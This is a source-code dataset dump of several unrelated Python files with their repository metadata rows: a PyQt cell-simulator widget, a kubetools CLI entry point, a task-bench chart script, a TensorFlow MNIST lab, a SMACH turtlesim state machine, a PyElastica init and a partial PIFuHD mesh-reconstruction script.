@pyqtSlot(bool)
def toggleRecord(self, rec):
self.record = rec
self.sim.savePickle = rec
@pyqtSlot()
def reset(self):
self.sim = Simulator(self.modname, self.dt)
self.frameNo = 0
@pyqtSlot()
def load(self):
qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
self.modfile = str(qs)
self.loadFile(self.modfile)
def loadFile(self, modstr):
(path,name) = os.path.split(modstr)
modname = str(name).split('.')[0]
self.modname = modname
sys.path.append(path)
if self.sim:
self.sim.reset(modname)
else:
self.sim = Simulator(modname, self.dt)
self.paintGL()
def animate(self):
if self.sim:
self.sim.step()
self.updateSelectedCell()
self.frameNo += 1
if self.record:
if (self.frameNo%5)==0:
self.setSnapshotCounter(self.frameNo)
self.saveSnapshot()
def updateSelectedCell(self):
if self.sim:
states = self.sim.cellStates
cid = self.selectedName
txt = ''
if states.has_key(cid):
s = states[cid]
for (name,val) in s.__dict__.items():
if name not in CellState.excludeAttr:
vals = str(val)
txt = txt + name + ': ' + vals + '\n'
self.selectedCell.emit(txt)
if self.sim.stepNum%100==0:
self.updateGL()
def postSelection(self, name):
self.selectedName = name
self.updateSelectedCell()
def paintGL(self):
PyGLWidget.paintGL(self)
glClearColor(0.5,0.5,0.5,0.0)
glClear(GL_COLOR_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
if self.sim:
for r in self.sim.renderers:
if r != None:
r.render_gl(self.selectedName)
glPopMatrix()
def drawWithNames(self):
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
if self.sim:
for r in self.sim.renderers:
if r:
r.renderNames_gl()
glPopMatrix()
class RenderInfo:
def __init__(self):
self.renderers = []
self.scale = 1.0
def addRenderer(self, renderer):
self.renderers.append(renderer)
def reset(self):
self.renderers = []
self.scale = 1.0
def setScale(self, s):
self.scale = s
| true | true |
f72edcdbbb2b57a739aa3dd65eb9b81da1a7a756 | 245 | py | Python | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 5 | 2020-04-20T21:24:14.000Z | 2022-01-29T15:35:02.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 69 | 2019-12-17T16:16:21.000Z | 2022-03-23T11:19:49.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 1 | 2022-01-14T04:12:15.000Z | 2022-01-14T04:12:15.000Z | #!/usr/bin/env python
from kubetools.dev import dev
from kubetools.main import run_cli
# Import click command groups
from kubetools.dev import ( # noqa: F401, I100, I202
container,
environment,
logs,
scripts,
)
run_cli(dev)
| 15.3125 | 53 | 0.706122 |
from kubetools.dev import dev
from kubetools.main import run_cli
from kubetools.dev import (
container,
environment,
logs,
scripts,
)
run_cli(dev)
| true | true |
f72edd75707f96cb22c318119a9cfc892b3341ff | 4,296 | py | Python | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 23 | 2018-08-31T03:51:08.000Z | 2021-10-21T08:01:44.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 30 | 2018-06-27T19:45:53.000Z | 2022-03-23T04:26:11.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 26 | 2018-05-29T22:56:59.000Z | 2022-01-27T18:54:26.000Z | #!/usr/bin/env python3
# Copyright 2020 Stanford University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
self.ngraphs = ngraphs
self.dependence = dependence.replace('_', ' ')
self.system = system
self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
self.csv_dialect = csv_dialect
self.header = []
self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
self.metg = collections.defaultdict(lambda: float('inf'))
def filter(self, row):
return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
def process(self, row, data, metg=None):
if self.system is not None:
assert metg is not None
self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
for values in zip(*list(data.values())):
items = dict(zip(data.keys(), values))
iterations = row['nodes'] * items['iterations']
if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
name = iterations if self.system is not None else row['name']
if name not in self.header:
self.header.append(name)
self.table[row['nodes']][name] = min(
items['elapsed'],
self.table[row['nodes']][name],
key=float)
def error_value(self):
return {}
def complete(self):
# FIXME: This isn't actually the criteria we'd like to sort on,
# we'd prefer to sort so that the list of names roughly parallels
# the order of the bars in the graph.
self.header.sort()
if self.system is not None:
self.header.reverse()
self.header.insert(0, 'nodes')
if self.system is not None:
self.header.append('metg')
out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
out.writeheader()
for nodes in sorted(self.table.keys()):
row = self.table[nodes]
row = {k: None if v == float('inf') else v for k, v in row.items()}
row['nodes'] = nodes
if self.system is not None:
row['metg'] = self.metg[nodes]
out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
parser = Parser(ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--ngraphs', type=int, required=True)
parser.add_argument('-d', '--dependence', required=True)
parser.add_argument('-s', '--system')
parser.add_argument('--max-problem-size')
parser.add_argument('--min-problem-size')
parser.add_argument('-m', '--machine', required=True)
parser.add_argument('-r', '--resource', default='flops')
parser.add_argument('-t', '--threshold', type=float, default=0.5)
parser.add_argument('--csv-dialect', default='excel-tab')
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
driver(**vars(args))
| 40.914286 | 162 | 0.649209 |
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
self.ngraphs = ngraphs
self.dependence = dependence.replace('_', ' ')
self.system = system
self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
self.csv_dialect = csv_dialect
self.header = []
self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
self.metg = collections.defaultdict(lambda: float('inf'))
def filter(self, row):
return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
def process(self, row, data, metg=None):
if self.system is not None:
assert metg is not None
self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
for values in zip(*list(data.values())):
items = dict(zip(data.keys(), values))
iterations = row['nodes'] * items['iterations']
if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
name = iterations if self.system is not None else row['name']
if name not in self.header:
self.header.append(name)
self.table[row['nodes']][name] = min(
items['elapsed'],
self.table[row['nodes']][name],
key=float)
def error_value(self):
return {}
def complete(self):
# the order of the bars in the graph.
self.header.sort()
if self.system is not None:
self.header.reverse()
self.header.insert(0, 'nodes')
if self.system is not None:
self.header.append('metg')
out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
out.writeheader()
for nodes in sorted(self.table.keys()):
row = self.table[nodes]
row = {k: None if v == float('inf') else v for k, v in row.items()}
row['nodes'] = nodes
if self.system is not None:
row['metg'] = self.metg[nodes]
out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
parser = Parser(ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--ngraphs', type=int, required=True)
parser.add_argument('-d', '--dependence', required=True)
parser.add_argument('-s', '--system')
parser.add_argument('--max-problem-size')
parser.add_argument('--min-problem-size')
parser.add_argument('-m', '--machine', required=True)
parser.add_argument('-r', '--resource', default='flops')
parser.add_argument('-t', '--threshold', type=float, default=0.5)
parser.add_argument('--csv-dialect', default='excel-tab')
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
driver(**vars(args))
| true | true |
f72ede905c2f5340f78dfcbe8efc10e27b0246a4 | 2,910 | py | Python | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 12 | 2018-03-07T00:44:56.000Z | 2019-01-25T11:07:43.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 3 | 2018-03-02T03:38:41.000Z | 2018-03-20T00:45:06.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 7 | 2018-03-02T07:14:53.000Z | 2019-01-04T08:06:47.000Z | # Lab 10 MNIST and NN
import tensorflow as tf
import random
# import matplotlib.pyplot as plt
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777) # reproducibility
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Check out https://www.tensorflow.org/get_started/mnist/beginners for
# more information about the mnist dataset
# parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
# input place holders
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & bias for nn layers
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b3
# define cost/loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# initialize
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
# plt.imshow(mnist.test.images[r:r + 1].
# reshape(28, 28), cmap='Greys', interpolation='nearest')
# plt.show()
'''
Epoch: 0001 cost = 141.207671860
Epoch: 0002 cost = 38.788445864
Epoch: 0003 cost = 23.977515479
Epoch: 0004 cost = 16.315132428
Epoch: 0005 cost = 11.702554882
Epoch: 0006 cost = 8.573139748
Epoch: 0007 cost = 6.370995680
Epoch: 0008 cost = 4.537178684
Epoch: 0009 cost = 3.216900532
Epoch: 0010 cost = 2.329708954
Epoch: 0011 cost = 1.715552875
Epoch: 0012 cost = 1.189857912
Epoch: 0013 cost = 0.820965160
Epoch: 0014 cost = 0.624131458
Epoch: 0015 cost = 0.454633765
Learning Finished!
Accuracy: 0.9455
'''
| 30.631579 | 78 | 0.713746 |
import tensorflow as tf
import random
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777)
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b3
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
| true | true |
f72edefdeaa956c002a8aa8310ace417a58e9aff | 5,653 | py | Python | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 3 | 2021-12-30T21:56:58.000Z | 2022-02-20T11:19:12.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 10 | 2021-11-13T21:18:33.000Z | 2022-03-11T23:11:23.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 2 | 2022-02-06T11:24:43.000Z | 2022-02-09T20:13:40.000Z | #!/usr/bin/env python3
"""
Description:
Usage:
$> roslaunch turtle_nodes.launch
$> ./executive_step_06.py
Output:
[INFO] : State machine starting in initial state 'RESET' with userdata:
[INFO] : State machine transitioning 'RESET':'succeeded'-->'SPAWN'
[INFO] : State machine transitioning 'SPAWN':'succeeded'-->'TELEPORT1'
[INFO] : State machine transitioning 'TELEPORT1':'succeeded'-->'TELEPORT2'
[INFO] : State machine transitioning 'TELEPORT2':'succeeded'-->'DRAW_SHAPES'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : State machine starting in initial state 'DRAW_WITH_MONITOR' with userdata:
[]
[INFO] : Concurrence starting with userdata:
[]
[WARN] : Still waiting for action server 'turtle_shape1' to start... is it running?
[WARN] : Still waiting for action server 'turtle_shape2' to start... is it running?
[INFO] : Connected to action server 'turtle_shape2'.
[INFO] : Connected to action server 'turtle_shape1'.
[INFO] : Preempt requested on action 'turtle_shape2'
[INFO] : Preempt on action 'turtle_shape2' cancelling goal:
edges: 6
radius: 0.5
[INFO] : Concurrent Outcomes: {'MONITOR': 'invalid', 'DRAW': 'preempted'}
[INFO] : State machine transitioning 'DRAW_WITH_MONITOR':'interrupted'-->'WAIT_FOR_CLEAR'
[INFO] : State machine transitioning 'WAIT_FOR_CLEAR':'invalid'-->'DRAW_WITH_MONITOR'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : Concurrent Outcomes: {'MONITOR': 'preempted', 'DRAW': 'succeeded'}
[INFO] : State machine terminating 'DRAW_WITH_MONITOR':'succeeded':'succeeded'
[INFO] : Concurrent Outcomes: {'SMALL': 'succeeded', 'BIG': 'succeeded'}
[INFO] : State machine terminating 'DRAW_SHAPES':'succeeded':'succeeded'
"""
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
rospy.init_node('smach_usecase_step_06')
# Construct static goals
polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
# Create a SMACH state machine
sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
# Open the container
with sm0:
# Reset turtlesim
StateMachine.add('RESET',
ServiceState('reset', std_srvs.srv.Empty),
{'succeeded':'SPAWN'})
# Create a second turtle
StateMachine.add('SPAWN',
ServiceState('spawn', turtlesim.srv.Spawn,
request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
{'succeeded':'TELEPORT1'})
# Teleport turtle 1
StateMachine.add('TELEPORT1',
ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
{'succeeded':'TELEPORT2'})
# Teleport turtle 2
StateMachine.add('TELEPORT2',
ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
{'succeeded':'DRAW_SHAPES'})
# Draw some polygons
shapes_cc = Concurrence(
outcomes=['succeeded','aborted','preempted'],
default_outcome='aborted',
outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
StateMachine.add('DRAW_SHAPES',shapes_cc)
with shapes_cc:
# Draw a large polygon with the first turtle
Concurrence.add('BIG',
SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
goal = polygon_big))
# Draw a small polygon with the second turtle
draw_monitor_cc = Concurrence(
['succeeded','aborted','preempted'],
'aborted',
child_termination_cb = lambda so: True,
outcome_map = {
'succeeded':{'DRAW':'succeeded'},
'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
'aborted':{'MONITOR':'invalid'}})
Concurrence.add('SMALL',draw_monitor_cc)
with draw_monitor_cc:
Concurrence.add('DRAW',
SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
goal = polygon_small))
def turtle_far_away(ud, msg):
"""Returns True while turtle pose in msg is at least 1 unit away from (9,5)"""
if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
return True
return False
Concurrence.add('MONITOR',
MonitorState('/turtle1/pose',turtlesim.msg.Pose,
cond_cb = turtle_far_away))
# Attach a SMACH introspection server
sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
sis.start()
# Set preempt handler
smach.set_preempt_handler(sm0)
# Execute SMACH tree in a separate thread so that we can ctrl-c the script
smach_thread = threading.Thread(target = sm0.execute)
smach_thread.start()
# Signal handler
rospy.spin()
if __name__ == '__main__':
main()
| 39.809859 | 111 | 0.61401 |
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
rospy.init_node('smach_usecase_step_06')
polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
with sm0:
StateMachine.add('RESET',
ServiceState('reset', std_srvs.srv.Empty),
{'succeeded':'SPAWN'})
StateMachine.add('SPAWN',
ServiceState('spawn', turtlesim.srv.Spawn,
request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
{'succeeded':'TELEPORT1'})
StateMachine.add('TELEPORT1',
ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
{'succeeded':'TELEPORT2'})
StateMachine.add('TELEPORT2',
ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
{'succeeded':'DRAW_SHAPES'})
shapes_cc = Concurrence(
outcomes=['succeeded','aborted','preempted'],
default_outcome='aborted',
outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
StateMachine.add('DRAW_SHAPES',shapes_cc)
with shapes_cc:
Concurrence.add('BIG',
SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
goal = polygon_big))
draw_monitor_cc = Concurrence(
['succeeded','aborted','preempted'],
'aborted',
child_termination_cb = lambda so: True,
outcome_map = {
'succeeded':{'DRAW':'succeeded'},
'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
'aborted':{'MONITOR':'invalid'}})
Concurrence.add('SMALL',draw_monitor_cc)
with draw_monitor_cc:
Concurrence.add('DRAW',
SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
goal = polygon_small))
def turtle_far_away(ud, msg):
if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
return True
return False
Concurrence.add('MONITOR',
MonitorState('/turtle1/pose',turtlesim.msg.Pose,
cond_cb = turtle_far_away))
sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
sis.start()
smach.set_preempt_handler(sm0)
smach_thread = threading.Thread(target = sm0.execute)
smach_thread.start()
rospy.spin()
if __name__ == '__main__':
main()
| true | true |
f72edff35f01d27c9da2c2eae2c4065b8bc7ba12 | 146 | py | Python | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 71 | 2020-04-15T17:02:42.000Z | 2022-03-26T04:53:51.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 59 | 2020-05-15T03:51:46.000Z | 2022-03-28T13:53:01.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 57 | 2020-06-17T20:34:02.000Z | 2022-03-16T08:09:54.000Z | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| 29.2 | 49 | 0.787671 | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| true | true |
f72ee0a79d6772df7fd35864b092bd02cfb99099 | 8,117 | py | Python | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
# if 'calib_world' in data:
# calib_world = data['calib_world'].numpy()[0]
# verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
color = np.zeros(verts.shape)
interval = 50000
for i in range(len(color) // interval + 1):
left = i * interval
if i == len(color) // interval:
right = -1
else:
right = (i + 1) * interval
net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
color[left:right] = nml.T
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
# if this returns error, projection must be defined somewhere else
xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
uv = xyz_tensor[:, :2, :]
color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
color = color * 0.5 + 0.5
if 'calib_world' in data:
calib_world = data['calib_world'].numpy()[0]
verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def recon(opt, use_rect=False):
# load checkpoints
state_dict_path = None
if opt.load_netMR_checkpoint_path is not None:
state_dict_path = opt.load_netMR_checkpoint_path
elif opt.resume_epoch < 0:
state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
opt.resume_epoch = 0
else:
state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
start_id = opt.start_id
end_id = opt.end_id
cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
state_dict = None
if state_dict_path is not None and os.path.exists(state_dict_path):
print('Resuming from ', state_dict_path)
state_dict = torch.load(state_dict_path, map_location=cuda)
print('Warning: opt is overwritten.')
dataroot = opt.dataroot
resolution = opt.resolution
results_path = opt.results_path
loadSize = opt.loadSize
opt = state_dict['opt']
opt.dataroot = dataroot
opt.resolution = resolution
opt.results_path = results_path
opt.loadSize = loadSize
else:
raise Exception('failed loading state dict!', state_dict_path)
# parser.print_options(opt)
if use_rect:
test_dataset = EvalDataset(opt)
else:
test_dataset = EvalWPoseDataset(opt)
print('test data size: ', len(test_dataset))
projection_mode = test_dataset.projection_mode
opt_netG = state_dict['opt_netG']
netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
def set_eval():
netG.eval()
# load checkpoints
netMR.load_state_dict(state_dict['model_state_dict'])
os.makedirs(opt.checkpoints_path, exist_ok=True)
os.makedirs(opt.results_path, exist_ok=True)
